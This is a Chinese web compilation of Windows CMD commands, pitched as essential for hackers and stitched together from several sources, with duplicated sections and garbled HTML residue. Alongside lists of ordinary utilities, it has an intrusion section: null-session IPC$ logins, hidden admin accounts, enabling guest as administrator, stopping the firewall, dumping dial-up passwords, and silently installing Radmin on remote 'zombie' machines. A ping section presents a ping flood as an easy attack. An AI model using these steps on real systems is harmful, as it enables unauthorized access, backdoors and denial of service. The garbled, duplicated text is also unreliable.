史上最全cmd命令大全黑客必备

常用CMD 命令net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接net use h: $">\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: $">\\ip\c$Content$nbsp;登陆后映射对方C：到本地为H:net use $">\\ip\ipc$Content$nbsp;/del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务；(如:net start telnet，net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$Content$nbsp;开启ipc$共享net share ipc$Content$nbsp;/del 删除ipc$共享net share c$Content$nbsp;/del 删除C：共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况，常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写tracert -参数ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

CMD命令大全，史上最全最详细CMD命令：开始－>运行－>键入cmd或command（在命令行里可以看到系统版本、文件系统版本）1. appwiz.cpl：程序和功能2. calc：启动计算器3. certmgr.msc：证书管理实用程序4. charmap：启动字符映射表5. chkdsk.exe：Chkdsk磁盘检查（管理员身份运行命令提示符）6. cleanmgr: 打开磁盘清理工具7. cliconfg：SQL SERVER 客户端网络实用工具8. cmstp：连接管理器配置文件安装程序9. cmd.exe：CMD命令提示符10. 自动关机命令Shutdown -s -t 600：表示600秒后自动关机shutdown -a ：可取消定时关机Shutdown -r -t 600：表示600秒后自动重启rundll32 user32.dll,LockWorkStation：表示锁定计算机11. colorcpl：颜色管理，配置显示器和打印机等中的色彩12. CompMgmtLauncher：计算机管理13. compmgmt.msc：计算机管理14. credwiz：备份或还原储存的用户名和密码15. comexp.msc：打开系统组件服务16. control：控制面版17. dcomcnfg：打开系统组件服务18. Dccw：显示颜色校准19. devmgmt.msc：设备管理器20. desk.cpl：屏幕分辨率21. dfrgui：优化驱动器Windows 7→dfrg.msc：磁盘碎片整理程序22. dialer：电话拨号程序23. diskmgmt.msc：磁盘管理24. dvdplay：DVD播放器25. dxdiag：检查DirectX信息26. eudcedit：造字程序27. eventvwr：事件查看器28. explorer：打开资源管理器29. Firewall.cpl：Windows防火墙30. FXSCOVER：传真封面编辑器31. fsmgmt.msc：共享文件夹管理器32. gpedit.msc：组策略33. hdwwiz.cpl：设备管理器34. inetcpl.cpl：Internet属性35. intl.cpl：区域36. iexpress：木马捆绑工具，系统自带37. joy.cpl：游戏控制器38. logoff：注销命令39. lusrmgr.msc：本地用户和组40. lpksetup：语言包安装/删除向导，安装向导会提示下载语言包41. lusrmgr.msc：本机用户和组42. main.cpl：鼠标属性43. mmsys.cpl：声音44. magnify：放大镜实用程序45. mem.exe：显示内存使用情况（如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。

[教學]必須掌握的八個DOS命令一，ping它是用來檢查網絡是否通暢或者網絡連接速度的命令。

作為一個生活在網絡上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網絡上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作繫統等。

下面就來看看它的一些常用的操作。

先看看幫助吧，在DOS 窗口中鍵入：ping/? 回車，。

所示的幫助畫面。

在此，我們隻掌握一些基本的很有用的參數就可以了（下同）。

-t表示將不間斷向目標IP發送數據包，直到我們強迫其停止。

試想，如果你使用100M的寬帶接入，而目標IP 是56K的小貓，那麼要不了多久，目標IP就因為承受不了這麼多的數據而掉線，呵呵，一次攻擊就這麼簡單的實現了。

-l定義發送數據包的大小，默認為32字節，我們利用它可以最大定義到65500字節。

結合上面介紹的-t參數一起使用，會有更好的效果哦。

-n定義向目標IP發送數據包的次數，默認為3次。

如果網絡速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。

說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標準，比如“ping IP -t -n3＂，雖然使用了-t參數，但並不是一直ping下去，而是隻ping 3次。

另外，ping命令不一定非得pingIP，也可以直接ping主機域名，這樣就可以得到主機的IP。

下面我們舉個例子來說明一下具體用法。

這裡time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這裡可以判斷網絡連接速度的大小。

從TTL的返回值可以初步判斷被ping主機的操作繫統，之所以說“初步判斷＂是因為這個值是可以修改的。

這裡TTL=32表示操作繫統可能是win98。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executableactmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引内容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的内容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration tool evntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在内存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a network connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote sy stems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

cmd.exe是一个命令扩展接口，外面利用它可以执行系统的环境变量下的任意可执行程序，操作类似与以前的ms-dos，但功能却比ms-dos要强大的多，虽然学习有点抽象，但我们只要把ms-dos的基础打好，也很容易上手，如果各位对dos命令很陌生的话，就先去补习一下dos命令再来看本文，如果文章前那位是位system高手，就请掠过次页吧，好了不多说废话，请看下面：一、外部命令：1、 atmadm.exe：打开ATM调用管理器，-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。

2、 arp.exe：查看和修改本地ARP（地址解析协议）表项命令，/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。

在使用ARP命令是通常是先PING 对方或网关的IP地址。

3、 attrib.exe：文件属性设置，+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件（支持通配符）、/d代表设置文件夹（支持通配符），设置选项如下：a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。

比如给c:\windows所有目录及子目录加系统、隐藏属性，命令如下：attrib +s +dc:\windows\*.* /s /d 。

4、 auditusr.exe：设置每用户审核策略，/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。

5、 blastcln.exe：微软的恶意程序移除工具命令行程序，只有/v参数，运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。

检测完毕之后会给出报告。

6、 bootcfg.exe：系统启动项配置程序，考虑到参数众多又对外面无多么大实际作用，大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。

黑客常用入侵命令控制面版：运行>>>>>>>>>>>:control计算机管理：command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务：net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如：)结束进程：NET SHARE查看版本：ver查看中端(服务）：net start查看文件：dir查看3389：加用户：c:\winnt\system32>net user adminserver$ admin /add提权限：net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令：telnet 主机IP踢人：logoff ID查看当前人：query user打开telnet:net start telnettelnet连接工具：OpenTelnet删除共享：net share c$=c:\删除共享：net share c$ /del启用GUEST：net user guest /active:yes为GUEST设密码：net user guest 888888提升到管理员：net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号：ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向：f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下：c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具 edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration toolevntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a networ k connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

八个cmd常用网络命令（黑客常用）一、ping它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。

下面就来看看它的一些常用的操作。

先看看帮助吧，在DOS窗口中键入：ping /? 回车。

所示的帮助画面。

在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。

试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP 就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。

结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。

如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如"ping IP -t -n 3"，虽然使用了-t参数，但并不是一直ping 下去，而是只ping 3次。

另外，ping命令不一定非得ping IP，也可以直接ping 主机域名，这样就可以得到主机的 IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小 。

从TTL的返回值可以初步判断被 ping主机的操作系统，之所以说"初步判断"是因为这个值是可以修改的。